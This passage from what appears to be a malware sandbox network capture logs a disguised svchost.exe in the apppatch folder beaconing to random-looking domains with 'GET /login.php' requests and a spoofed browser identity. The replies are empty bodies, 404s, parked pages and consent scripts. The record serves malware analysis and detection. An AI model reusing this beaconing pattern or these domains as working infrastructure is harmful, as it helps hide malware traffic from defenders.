Nov 11, 2024 18:14:52.659631968 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Nov 11, 2024 18:14:53.430680990 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345293\|1731345181\|45\|3\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Nov 11, 2024 18:14:53.431519985 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345293\|1731345181\|45\|3\|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.6	64566	154.212.231.82	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.822504044 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Nov 11, 2024 18:14:53.706125021 CET	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:14:53.734622002 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Nov 11, 2024 18:14:54.078891993 CET	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.6	64567	199.59.243.227	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.822596073 CET	243	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Nov 11, 2024 18:14:53.431220055 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:14:52 GMT content-type: text/html; charset=utf-8 content-length: 1094 x-request-id: 6af4f88a-7d36-4a7d-ba42-3b28d9e6c9e7 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ== set-cookie: parking_session=6af4f88a-7d36-4a7d-ba42-3b28d9e6c9e7; expires=Mon, 11 Nov 2024 17:29:53 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:14:53.431252003 CET	528	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmFmNGY4OGEtN2QzNi00YTdkLWJhNDItM2IyOGQ5ZTZjOWU3IiwicGFnZV90aW1lIjoxNzMxMzQ1MjkzLCJwYWdlX3VybCI6I
Nov 11, 2024 18:14:53.431423903 CET	528	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmFmNGY4OGEtN2QzNi00YTdkLWJhNDItM2IyOGQ5ZTZjOWU3IiwicGFnZV90aW1lIjoxNzMxMzQ1MjkzLCJwYWdlX3VybCI6I
Nov 11, 2024 18:14:53.668106079 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 11 Nov 2024 17:14:52 GMT content-type: text/html; charset=utf-8 content-length: 1094 x-request-id: 6af4f88a-7d36-4a7d-ba42-3b28d9e6c9e7 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ== set-cookie: parking_session=6af4f88a-7d36-4a7d-ba42-3b28d9e6c9e7; expires=Mon, 11 Nov 2024 17:29:53 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.6	64569	3.94.10.34	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.822777987 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Nov 11, 2024 18:14:53.431265116 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345293\|1731345181\|40\|4\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Nov 11, 2024 18:14:53.668118954 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345293\|1731345181\|40\|4\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.6	64570	18.208.156.248	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.822851896 CET	353	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Nov 11, 2024 18:14:53.431277037 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345293\|1731345181\|40\|4\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Nov 11, 2024 18:14:53.668047905 CET	335	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 11 Nov 2024 17:14:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345293\|1731345181\|40\|4\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.6	64571	199.191.50.83	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 18:14:52.822868109 CET	281	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478890781963739088
Nov 11, 2024 18:14:55.015415907 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 17:14:53 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 61 39 34 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED] Data Ascii: a94a<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
Nov 11, 2024 18:14:55.015430927 CET	212	IN	Data Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f Data Ascii: f(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host
Nov 11, 2024 18:14:55.015444040 CET	1236	IN	Data Raw: 3d 22 61 2e 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 6e 22 20 69 6e 20 77 69 6e 64 6f 77 29 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 3d 22 63 64 6e 2e 63 6f Data Ascii: ="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=funct
Nov 11, 2024 18:14:55.015456915 CET	212	IN	Data Raw: 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 21 3d 2d 31 29 7b 63 2e 70 75 73 68 28 65 2e 73 75 62 73 74 72 28 65 2e 69 6e 64 65 78 4f 66 28 22 63 6d 70 6c 61 6e 67 3d 22 29 2b 38 2c 32 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 Data Ascii: .indexOf("cmplang=")!=-1){c.push(e.substr(e.indexOf("cmplang=")+8,2).toUpperCase())}else{if("cmp_setlang" in window&&window.cmp_setlang!=""){c.push(window.cmp_setlang.toUpperCase())}else{if(a.length>0){for(var d=
Nov 11, 2024 18:14:55.015467882 CET	1236	IN	Data Raw: 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 63 2e 70 75 73 68 28 61 5b 64 5d 29 7d 7d 7d 7d 7d 69 66 28 22 6c 61 6e 67 75 61 67 65 22 20 69 6e 20 6e 61 76 69 67 61 74 6f 72 29 7b 63 2e 70 75 73 68 28 6e 61 76 69 67 61 74 6f 72 2e 6c 61 Data Ascii: 0;d<a.length;d++){c.push(a[d])}}}}}if("language" in navigator){c.push(navigator.language)}if("userLanguage" in navigator){c.push(navigator.userLanguage)}var h="";for(var d=0;d<c.length;d++){var b=c[d].toUpperCase();if(g.indexOf(b)!=-1){h=b;bre
Nov 11, 2024 18:14:55.015480995 CET	14	IN	Data Raw: 74 22 29 3b 6a 2e 73 65 74 41 74 74 72 69 Data Ascii: t");j.setAttri
Nov 11, 2024 18:14:55.015594959 CET	1236	IN	Data Raw: 62 75 74 65 28 22 64 61 74 61 2d 63 6d 70 2d 61 62 22 2c 22 31 22 29 3b 76 61 72 20 63 3d 78 28 22 63 6d 70 64 65 73 69 67 6e 22 2c 22 63 6d 70 5f 64 65 73 69 67 6e 22 20 69 6e 20 68 3f 68 2e 63 6d 70 5f 64 65 73 69 67 6e 3a 22 22 29 3b 76 61 72 Data Ascii: bute("data-cmp-ab","1");var c=x("cmpdesign","cmp_design" in h?h.cmp_design:"");var f=x("cmpregulationkey","cmp_regulationkey" in h?h.cmp_regulationkey:"");var r=x("cmpgppkey","cmp_gppkey" in h?h.cmp_gppkey:"");var n=x("cmpatt","cmp_att" in h?h
Nov 11, 2024 18:14:55.015615940 CET	1236	IN	Data Raw: 22 2c 22 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 20 69 6e 20 68 3f 68 2e 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 3a 22 22 29 3b 69 66 28 61 3d 3d 22 31 22 29 7b 6d 3d 22 69 6e 73 74 72 75 6d 65 6e 74 65 64 22 3b 70 3d 22 Data Ascii: ","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;
Nov 11, 2024 18:14:55.015630960 CET	424	IN	Data Raw: 22 3d 22 29 29 3b 69 66 28 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 21 3d 2d 31 29 7b 76 61 72 20 63 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 29 7d 65 6c Data Ascii: "="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=functio
Nov 11, 2024 18:14:55.015641928 CET	1236	IN	Data Raw: 61 79 53 74 61 74 75 73 3a 22 68 69 64 64 65 6e 22 2c 61 70 69 56 65 72 73 69 6f 6e 3a 22 32 2e 32 22 2c 63 6d 70 49 64 3a 33 31 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 61 5b 32 5d 28 66 61 6c 73 65 2c 74 72 75 65 29 7d 7d 65 6c 73 65 7b 69 66 28 Data Ascii: ayStatus:"hidden",apiVersion:"2.2",cmpId:31},true)}else{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListe
Nov 11, 2024 18:14:55.020559072 CET	1236	IN	Data Raw: 65 72 49 64 3a 65 2c 64 61 74 61 3a 68 2c 70 69 6e 67 44 61 74 61 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 Data Ascii: erId:e,data:h,pingData:window.cmp_gpp_ping()}}else{if(g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"\|\|g==="getSection"\|\|g==="getFiel

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.6	64568	44.221.84.105	80	4888	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
